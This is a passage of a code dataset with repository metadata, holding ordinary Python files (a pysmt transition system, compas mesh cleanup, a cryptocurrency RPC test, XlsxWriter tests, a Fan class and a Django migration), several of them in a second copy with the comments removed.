pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc = Location(env, mgr.LE(z, i_0))
loc.set_progress(0, mgr.Equals(x_z, z))
h_z = Hint("h_z0", env, frozenset([z]), symbs)
h_z.set_locs([loc])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_0))
loc0.set_progress(1, mgr.Equals(x_pc, i_1))
loc1 = Location(env, mgr.Equals(pc, i_1))
loc1.set_progress(2, mgr.Equals(x_pc, i_2))
loc2 = Location(env, mgr.Equals(pc, i_2))
loc2.set_progress(0, mgr.Equals(x_pc, i_3))
loc3 = Location(env, mgr.Equals(pc, i_3))
loc3.set_progress(0, mgr.Equals(x_pc, i_0))
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2, loc3])
res.append(h_pc)
stutter = mgr.Equals(x_x, x)
loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1)))
h_x = Hint("h_x2", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0))
loc0.set_progress(1, mgr.Equals(x_z, y))
loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3))
loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x)))
h_z = Hint("h_z3", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
| 34.981735
| 81
| 0.530087
|
from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
init = pcs[0]
cfg = mgr.And(
mgr.Implies(pcend, x_pcend),
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
mgr.Implies(pcs[3], x_pcs[4]),
mgr.Implies(pcs[4], x_pcs[2]))
labels = mgr.And(
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
trans = mgr.And(cfg, labels)
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc = Location(env, mgr.LE(z, i_0))
loc.set_progress(0, mgr.Equals(x_z, z))
h_z = Hint("h_z0", env, frozenset([z]), symbs)
h_z.set_locs([loc])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_0))
loc0.set_progress(1, mgr.Equals(x_pc, i_1))
loc1 = Location(env, mgr.Equals(pc, i_1))
loc1.set_progress(2, mgr.Equals(x_pc, i_2))
loc2 = Location(env, mgr.Equals(pc, i_2))
loc2.set_progress(0, mgr.Equals(x_pc, i_3))
loc3 = Location(env, mgr.Equals(pc, i_3))
loc3.set_progress(0, mgr.Equals(x_pc, i_0))
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2, loc3])
res.append(h_pc)
stutter = mgr.Equals(x_x, x)
loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1)))
h_x = Hint("h_x2", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0))
loc0.set_progress(1, mgr.Equals(x_z, y))
loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3))
loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x)))
h_z = Hint("h_z3", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
| true
| true
|
f705dfb5b1b2d9fb7211529c9252df251ac0bfc7
| 2,270
|
py
|
Python
|
src/compas/datastructures/mesh/core/clean.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
src/compas/datastructures/mesh/core/clean.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
src/compas/datastructures/mesh/core/clean.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.utilities import geometric_key
__all__ = [
'mesh_delete_duplicate_vertices'
]
def mesh_delete_duplicate_vertices(mesh, precision=None):
    """Cull all duplicate vertices of a mesh and sanitize affected faces.
    Parameters
    ----------
    mesh : Mesh
        A mesh object.
    precision : str (None)
        A formatting option that specifies the precision of the
        individual numbers in the string (truncation after the decimal point).
        Supported values are any float precision, or decimal integer (``'d'``).
        Default is ``'3f'``.
    Returns
    -------
    None
        The mesh is modified in-place.
    Examples
    --------
    >>> import compas
    >>> from compas.datastructures import Mesh
    >>> mesh = Mesh.from_obj(compas.get('faces.obj'))
    >>> mesh.number_of_vertices()
    36
    >>> for x, y, z in mesh.vertices_attributes('xyz', keys=list(mesh.vertices())[:5]):
    ...     mesh.add_vertex(x=x, y=y, z=z)
    ...
    36
    37
    38
    39
    40
    >>> mesh.number_of_vertices()
    41
    >>> mesh_delete_duplicate_vertices(mesh)
    >>> mesh.number_of_vertices()
    36
    """
    # Map every vertex key to its geometric key (coordinates rounded to
    # ``precision``); vertices sharing a geometric key are duplicates.
    key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()}
    # Reverse map keeps exactly one canonical vertex key per location
    # (the last one encountered wins).
    gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())}
    for key in list(mesh.vertices()):
        test = gkey_key[key_gkey[key]]
        if test != key:
            # ``key`` is a duplicate: drop its vertex and halfedge records,
            # then purge it from the neighbor tables of all other vertices.
            del mesh.vertex[key]
            del mesh.halfedge[key]
            for u in mesh.halfedge:
                nbrs = list(mesh.halfedge[u].keys())
                for v in nbrs:
                    if v == key:
                        del mesh.halfedge[u][v]
    for fkey in mesh.faces():
        # Rewrite each face with canonical keys, dropping repeats that the
        # remapping may have introduced.
        seen = set()
        face = []
        for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]:
            if key not in seen:
                seen.add(key)
                face.append(key)
        mesh.face[fkey] = face
        # Rebuild the halfedge records of the sanitized face.
        for u, v in mesh.face_halfedges(fkey):
            mesh.halfedge[u][v] = fkey
            if u not in mesh.halfedge[v]:
                mesh.halfedge[v][u] = None
| 28.734177
| 119
| 0.584141
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.utilities import geometric_key
__all__ = [
'mesh_delete_duplicate_vertices'
]
def mesh_delete_duplicate_vertices(mesh, precision=None):
    """Cull duplicate vertices of ``mesh`` in place and fix affected faces."""
    # Geometric key per vertex; equal keys identify duplicate locations.
    key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()}
    # One canonical vertex key per geometric key (last one wins).
    gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())}
    for key in list(mesh.vertices()):
        test = gkey_key[key_gkey[key]]
        if test != key:
            # Remove the duplicate vertex and every reference to it.
            del mesh.vertex[key]
            del mesh.halfedge[key]
            for u in mesh.halfedge:
                nbrs = list(mesh.halfedge[u].keys())
                for v in nbrs:
                    if v == key:
                        del mesh.halfedge[u][v]
    for fkey in mesh.faces():
        # Remap face vertices to canonical keys, dropping repeats.
        seen = set()
        face = []
        for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]:
            if key not in seen:
                seen.add(key)
                face.append(key)
        mesh.face[fkey] = face
        # Rebuild halfedge records for the sanitized face.
        for u, v in mesh.face_halfedges(fkey):
            mesh.halfedge[u][v] = fkey
            if u not in mesh.halfedge[v]:
                mesh.halfedge[v][u] = None
| true
| true
|
f705dfc786bdc45229a3f652451375438bf1d183
| 2,856
|
py
|
Python
|
qa/rpc-tests/blockchain.py
|
dnoiz1/ruxcoin
|
07e30a2b5ebc624ac8a2d92be435e895ede5deae
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/blockchain.py
|
dnoiz1/ruxcoin
|
07e30a2b5ebc624ac8a2d92be435e895ede5deae
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/blockchain.py
|
dnoiz1/ruxcoin
|
07e30a2b5ebc624ac8a2d92be435e895ede5deae
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Ruxcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test RPC calls related to blockchain state. Tests correspond to code in
# rpc/blockchain.cpp.
#
from decimal import Decimal
from test_framework.test_framework import RuxcoinTestFramework
from test_framework.authproxy import JSONRPCException
from test_framework.util import (
assert_equal,
assert_raises,
assert_is_hex_string,
assert_is_hash_string,
start_nodes,
connect_nodes_bi,
)
class BlockchainTest(RuxcoinTestFramework):
    """
    Test blockchain-related RPC calls:
    - gettxoutsetinfo
    - verifychain
    """

    def __init__(self):
        super().__init__()
        # Reuse the cached 200-block regtest chain; the UTXO-set assertions
        # below depend on that exact chain state.
        self.setup_clean_chain = False
        self.num_nodes = 2

    def setup_network(self, split=False):
        """Start two connected nodes and sync them."""
        self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
        connect_nodes_bi(self.nodes, 0, 1)
        self.is_network_split = False
        self.sync_all()

    def run_test(self):
        self._test_gettxoutsetinfo()
        self._test_getblockheader()
        # Final sanity check of the whole chain at check level 4, depth 0.
        self.nodes[0].verifychain(4, 0)

    def _test_gettxoutsetinfo(self):
        """Check gettxoutsetinfo against the known 200-block regtest chain."""
        node = self.nodes[0]
        res = node.gettxoutsetinfo()
        assert_equal(res['total_amount'], Decimal('8725.00000000'))
        assert_equal(res['transactions'], 200)
        assert_equal(res['height'], 200)
        assert_equal(res['txouts'], 200)
        # Fixed: the original statement ended with a stray trailing comma,
        # which wrapped the call in a throwaway one-element tuple.
        assert_equal(res['bytes_serialized'], 13924)
        assert_equal(len(res['bestblock']), 64)
        assert_equal(len(res['hash_serialized']), 64)

    def _test_getblockheader(self):
        """Validate getblockheader fields and its error handling."""
        node = self.nodes[0]
        # An invalid hash must raise rather than return data.
        assert_raises(
            JSONRPCException, lambda: node.getblockheader('nonsense'))
        besthash = node.getbestblockhash()
        secondbesthash = node.getblockhash(199)
        header = node.getblockheader(besthash)
        assert_equal(header['hash'], besthash)
        assert_equal(header['height'], 200)
        assert_equal(header['confirmations'], 1)
        assert_equal(header['previousblockhash'], secondbesthash)
        assert_is_hex_string(header['chainwork'])
        assert_is_hash_string(header['hash'])
        assert_is_hash_string(header['previousblockhash'])
        assert_is_hash_string(header['merkleroot'])
        # 'bits' is hex but not a fixed 64-char hash, so skip the length check.
        assert_is_hash_string(header['bits'], length=None)
        assert isinstance(header['time'], int)
        assert isinstance(header['mediantime'], int)
        assert isinstance(header['nonce'], int)
        assert isinstance(header['version'], int)
        assert isinstance(int(header['versionHex'], 16), int)
        assert isinstance(header['difficulty'], Decimal)
# Run the functional test when executed directly.
if __name__ == '__main__':
    BlockchainTest().main()
| 31.733333
| 73
| 0.678221
|
from decimal import Decimal
from test_framework.test_framework import RuxcoinTestFramework
from test_framework.authproxy import JSONRPCException
from test_framework.util import (
assert_equal,
assert_raises,
assert_is_hex_string,
assert_is_hash_string,
start_nodes,
connect_nodes_bi,
)
class BlockchainTest(RuxcoinTestFramework):
    """Functional test of blockchain state RPCs (gettxoutsetinfo,
    getblockheader, verifychain)."""
    def __init__(self):
        super().__init__()
        # Reuse the cached 200-block chain; the assertions depend on it.
        self.setup_clean_chain = False
        self.num_nodes = 2
    def setup_network(self, split=False):
        # Start two connected nodes and sync them.
        self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
        connect_nodes_bi(self.nodes, 0, 1)
        self.is_network_split = False
        self.sync_all()
    def run_test(self):
        self._test_gettxoutsetinfo()
        self._test_getblockheader()
        # Sanity-check the chain at check level 4, depth 0.
        self.nodes[0].verifychain(4, 0)
    def _test_gettxoutsetinfo(self):
        # Check UTXO-set stats against the known 200-block regtest chain.
        node = self.nodes[0]
        res = node.gettxoutsetinfo()
        assert_equal(res['total_amount'], Decimal('8725.00000000'))
        assert_equal(res['transactions'], 200)
        assert_equal(res['height'], 200)
        assert_equal(res['txouts'], 200)
        # NOTE(review): the trailing comma below makes this a throwaway
        # tuple expression; harmless but likely unintended.
        assert_equal(res['bytes_serialized'], 13924),
        assert_equal(len(res['bestblock']), 64)
        assert_equal(len(res['hash_serialized']), 64)
    def _test_getblockheader(self):
        # Validate getblockheader fields and error handling.
        node = self.nodes[0]
        assert_raises(
            JSONRPCException, lambda: node.getblockheader('nonsense'))
        besthash = node.getbestblockhash()
        secondbesthash = node.getblockhash(199)
        header = node.getblockheader(besthash)
        assert_equal(header['hash'], besthash)
        assert_equal(header['height'], 200)
        assert_equal(header['confirmations'], 1)
        assert_equal(header['previousblockhash'], secondbesthash)
        assert_is_hex_string(header['chainwork'])
        assert_is_hash_string(header['hash'])
        assert_is_hash_string(header['previousblockhash'])
        assert_is_hash_string(header['merkleroot'])
        # 'bits' is hex but not a 64-char hash, hence length=None.
        assert_is_hash_string(header['bits'], length=None)
        assert isinstance(header['time'], int)
        assert isinstance(header['mediantime'], int)
        assert isinstance(header['nonce'], int)
        assert isinstance(header['version'], int)
        assert isinstance(int(header['versionHex'], 16), int)
        assert isinstance(header['difficulty'], Decimal)
# Run the functional test when executed directly.
if __name__ == '__main__':
    BlockchainTest().main()
| true
| true
|
f705e0706875e8cf396e8b98af019ceeec2c23b1
| 1,971
|
py
|
Python
|
xlsxwriter/test/comparison/test_button07.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-07-01T07:24:37.000Z
|
2020-07-01T07:24:37.000Z
|
xlsxwriter/test/comparison/test_button07.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/comparison/test_button07.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """

    def setUp(self):
        self.set_filename('button07.xlsm')

    def _create_button_file(self, vba_names=None):
        """Create the macro workbook with an inserted button and compare it.

        vba_names: None to rely on implicit VBA names, an empty tuple to
        call ``set_vba_name()`` with its defaults, or a
        ``(workbook_name, worksheet_name)`` pair for explicit names.
        """
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()

        if vba_names is not None:
            if vba_names:
                workbook.set_vba_name(vba_names[0])
                worksheet.set_vba_name(vba_names[1])
            else:
                workbook.set_vba_name()
                worksheet.set_vba_name()

        worksheet.insert_button('C2', {'macro': 'say_hello',
                                       'caption': 'Hello'})

        workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin')

        workbook.close()

        self.assertExcelEqual()

    def test_create_file(self):
        """Test the creation of a simple XlsxWriter file."""
        self._create_button_file(vba_names=())

    def test_create_file_explicit_vba_names(self):
        """Test the creation of a simple XlsxWriter file."""
        self._create_button_file(vba_names=('ThisWorkbook', 'Sheet1'))

    def test_create_file_implicit_vba_names(self):
        """Test the creation of a simple XlsxWriter file."""
        self._create_button_file()
| 26.28
| 79
| 0.598681
| true
| true
|
|
f705e11b73b8ab51a2717f76d0f1699b82a7b0ae
| 258
|
py
|
Python
|
biot/core/fan.py
|
AroliantBIoT/biot-orangepi-client
|
60df602816cdc0c668e58f91512e93eb5bec3c6d
|
[
"MIT"
] | null | null | null |
biot/core/fan.py
|
AroliantBIoT/biot-orangepi-client
|
60df602816cdc0c668e58f91512e93eb5bec3c6d
|
[
"MIT"
] | null | null | null |
biot/core/fan.py
|
AroliantBIoT/biot-orangepi-client
|
60df602816cdc0c668e58f91512e93eb5bec3c6d
|
[
"MIT"
] | null | null | null |
class Fan():
    """A fan device addressed by a device ID, with speed accessor stubs."""

    # Class-level fallback: stays None when no valid ID was supplied.
    deviceID = None

    def __init__(self, deviceID):
        if deviceID is not None:
            self.deviceID = deviceID
        else:
            # Warn and leave the class-level None in place.
            print("Provide a Device ID")

    def setSpeed(self):
        # Placeholder: speed control not implemented yet.
        pass

    def getSpeed(self):
        # Placeholder: speed query not implemented yet.
        pass
| 16.125
| 45
| 0.678295
|
class Fan():
    """A fan device addressed by a device ID, with speed accessor stubs."""
    # Class-level fallback: stays None when no valid ID was supplied.
    deviceID = None
    def __init__(self, deviceID):
        if deviceID is None:
            # Warn and bail out; instance keeps the class-level None.
            print("Provide a Device ID")
            return
        self.deviceID = deviceID
    def setSpeed(self):
        # Placeholder: not implemented yet.
        pass
    def getSpeed(self):
        # Placeholder: not implemented yet.
        pass
| true
| true
|
f705e133aa7892ba240c4677420a97b286673317
| 3,271
|
py
|
Python
|
projects_api/migrations/0001_initial.py
|
diegoinn/profile-rest-api
|
a5b8c9dfe5453db24e93d05367d33e6f37c65966
|
[
"MIT"
] | null | null | null |
projects_api/migrations/0001_initial.py
|
diegoinn/profile-rest-api
|
a5b8c9dfe5453db24e93d05367d33e6f37c65966
|
[
"MIT"
] | null | null | null |
projects_api/migrations/0001_initial.py
|
diegoinn/profile-rest-api
|
a5b8c9dfe5453db24e93d05367d33e6f37c65966
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2020-10-29 04:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: lookup tables (ConstructionSystem, Material, Origin,
    Section, Unit), the Project model, and the MaterialSchemeProject join
    model tying them together.

    Auto-generated by Django; avoid hand-editing applied migrations.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='ConstructionSystem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_construction_system', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Material',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_material', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Origin',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_origin', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_project', models.CharField(max_length=255)),
                ('use', models.CharField(max_length=255)),
                ('builded_surface', models.IntegerField()),
                ('living_area', models.IntegerField()),
                ('tier', models.IntegerField()),
                ('useful_life', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='Section',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_section', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Unit',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_unit', models.CharField(max_length=255)),
            ],
        ),
        # Join model: one row per material usage within a project scheme.
        migrations.CreateModel(
            name='MaterialSchemeProject',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('quantity', models.IntegerField()),
                ('provider_distance', models.IntegerField()),
                ('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')),
                ('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')),
                ('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')),
                ('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')),
                ('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')),
            ],
        ),
    ]
| 43.039474
| 148
| 0.578416
|
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for projects_api: lookup tables, Project, and the
    MaterialSchemeProject join model (auto-generated by Django)."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='ConstructionSystem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_construction_system', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Material',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_material', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Origin',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_origin', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_project', models.CharField(max_length=255)),
                ('use', models.CharField(max_length=255)),
                ('builded_surface', models.IntegerField()),
                ('living_area', models.IntegerField()),
                ('tier', models.IntegerField()),
                ('useful_life', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='Section',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_section', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Unit',
            fields=[
